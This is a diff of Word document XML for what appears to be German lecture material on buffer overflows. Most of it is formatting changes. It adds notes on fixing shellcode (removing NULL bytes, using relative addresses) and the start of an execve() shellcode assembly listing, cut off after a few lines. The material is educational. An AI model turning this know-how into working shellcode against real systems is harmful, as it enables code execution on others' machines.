+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -2168,6 +5560,25 @@
       <w:color w:val="4F81BD" w:themeColor="accent1"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Beschriftung">
+    <w:name w:val="caption"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:uiPriority w:val="35"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="008B1A26"/>
+    <w:pPr>
+      <w:spacing w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/buffer_overflow.docx
+++ b/buffer_overflow.docx
@@ -113,7 +113,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CA3695E" wp14:editId="140DFCCA">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>225620</wp:posOffset>
@@ -139,7 +139,10 @@
                           <a:avLst/>
                         </a:prstGeom>
                         <a:solidFill>
-                          <a:schemeClr val="lt1"/>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
                         </a:solidFill>
                         <a:ln w="6350">
                           <a:solidFill>
@@ -288,7 +291,8 @@
                 <v:stroke joinstyle="miter"/>
                 <v:path gradientshapeok="t" o:connecttype="rect"/>
               </v:shapetype>
-              <v:shape id="Textfeld 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:6.75pt;width:315pt;height:89.65pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight=".5pt">
+              <v:shape id="Textfeld 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:6.75pt;width:315pt;height:89.65pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -464,9 +468,9 @@
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
           <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:223.9pt;height:287.2pt" o:ole="">
-            <v:imagedata r:id="rId8" o:title=""/>
+            <v:imagedata r:id="rId9" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1411797913" r:id="rId9"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1411805176" r:id="rId10"/>
         </w:object>
       </w:r>
     </w:p>
@@ -489,9 +493,9 @@
       <w:r>
         <w:object w:dxaOrig="6028" w:dyaOrig="9345">
           <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:301.45pt;height:467.6pt" o:ole="">
-            <v:imagedata r:id="rId10" o:title=""/>
+            <v:imagedata r:id="rId11" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1411797914" r:id="rId11"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1411805177" r:id="rId12"/>
         </w:object>
       </w:r>
     </w:p>
@@ -758,7 +762,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42D81E75" wp14:editId="78153ADA">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77A7895A" wp14:editId="714D35D5">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>225425</wp:posOffset>
@@ -908,10 +912,6 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-                <v:stroke joinstyle="miter"/>
-                <v:path gradientshapeok="t" o:connecttype="rect"/>
-              </v:shapetype>
               <v:shape id="Textfeld 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.85pt;width:117.2pt;height:107.6pt;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                 <v:fill opacity="52428f"/>
                 <v:textbox>
@@ -1005,7 +1005,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0B4E5AE2" wp14:editId="58013EEE">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A171B33" wp14:editId="237B3FE2">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>2054420</wp:posOffset>
@@ -1351,7 +1351,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A4E7819" wp14:editId="3F623D5C">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>225620</wp:posOffset>
@@ -1867,10 +1867,7 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
+    <w:p/>
     <w:p/>
     <w:p/>
     <w:p/>
@@ -1916,7 +1913,7 @@
           <w:lang w:eastAsia="de-DE"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295205A1" wp14:editId="4AAEACC2">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36D8C9F0" wp14:editId="35C7DC06">
             <wp:extent cx="3619500" cy="1752600"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="5" name="Grafik 5"/>
@@ -1931,7 +1928,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12">
+                    <a:blip r:embed="rId13">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1965,14 +1962,27 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> - </w:t>
       </w:r>
@@ -1999,7 +2009,7 @@
           <w:lang w:eastAsia="de-DE"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7558FEBB" wp14:editId="723147CA">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F5091DE" wp14:editId="60F8DA9F">
             <wp:extent cx="5746159" cy="4497105"/>
             <wp:effectExtent l="0" t="0" r="6985" b="0"/>
             <wp:docPr id="6" name="Grafik 6"/>
@@ -2014,7 +2024,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13">
+                    <a:blip r:embed="rId14">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2048,14 +2058,27 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> - ESP </w:t>
       </w:r>
@@ -2080,7 +2103,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C0684C" wp14:editId="606DF291">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E7F1F5" wp14:editId="6E3A28EE">
             <wp:extent cx="5667375" cy="952500"/>
             <wp:effectExtent l="0" t="0" r="9525" b="0"/>
             <wp:docPr id="7" name="Grafik 7"/>
@@ -2095,7 +2118,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14">
+                    <a:blip r:embed="rId15">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2129,14 +2152,27 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> - ESP nach Überschreibung des RET Wertes</w:t>
       </w:r>
@@ -2154,7 +2190,7 @@
           <w:lang w:eastAsia="de-DE"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E57BBBC" wp14:editId="06CA0759">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48412600" wp14:editId="065BAB70">
             <wp:extent cx="5695950" cy="2009775"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="8" name="Grafik 8"/>
@@ -2169,7 +2205,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId16">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2203,14 +2239,27 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>4</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> - </w:t>
       </w:r>
@@ -2266,7 +2315,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05CCAE93" wp14:editId="1851EA70">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>2396064</wp:posOffset>
@@ -2362,7 +2411,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="199B8489" wp14:editId="7E3837EF">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>225620</wp:posOffset>
@@ -2869,7 +2918,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4DC6C68E" wp14:editId="5DBC23CE">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>3076575</wp:posOffset>
@@ -2987,9 +3036,9 @@
       <w:r>
         <w:object w:dxaOrig="8012" w:dyaOrig="9544">
           <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:356.05pt;height:423.3pt" o:ole="">
-            <v:imagedata r:id="rId16" o:title=""/>
+            <v:imagedata r:id="rId17" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1411797915" r:id="rId17"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1411805178" r:id="rId18"/>
         </w:object>
       </w:r>
     </w:p>
@@ -3016,7 +3065,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15B67719" wp14:editId="1403A4B8">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>225620</wp:posOffset>
@@ -4010,8 +4059,1895 @@
       </w:r>
     </w:p>
     <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Probleme mit diesem </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Der </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> beinhaltet NULL=‘0‘, diese können nicht in ein </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>character</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>array</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> eingefügt werden, da sie dort das Ende des Strings bedeuten würden</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>NULL Anweisungen entfernen</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Nutzung von fest programmierten Adressen, dadurch funktioniert es nicht auf allen Rechnern</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>Relative Adressen verwenden</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:sectPr>
+          <w:headerReference w:type="default" r:id="rId19"/>
+          <w:pgSz w:w="11906" w:h="16838"/>
+          <w:pgMar w:top="1417" w:right="1417" w:bottom="1134" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:cols w:space="708"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Benutzbaren </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> für </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Execve</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>() erstellen</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:object w:dxaOrig="10655" w:dyaOrig="7326">
+          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:532.5pt;height:366.35pt" o:ole="">
+            <v:imagedata r:id="rId20" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1411805179" r:id="rId21"/>
+        </w:object>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:sectPr>
+          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
+          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1134" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:cols w:space="708"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> nach der Modifizierung</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:noProof/>
+          <w:u w:val="single"/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="571DD080" wp14:editId="2DD4A4DA">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>287201</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4686300" cy="4459424"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="17780"/>
+                <wp:wrapNone/>
+                <wp:docPr id="13" name="Textfeld 13"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4686300" cy="4459424"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>.</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>text</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>.</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>globl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> _</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>start</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>_</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>start</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>jmp</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>MyCallStatement</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
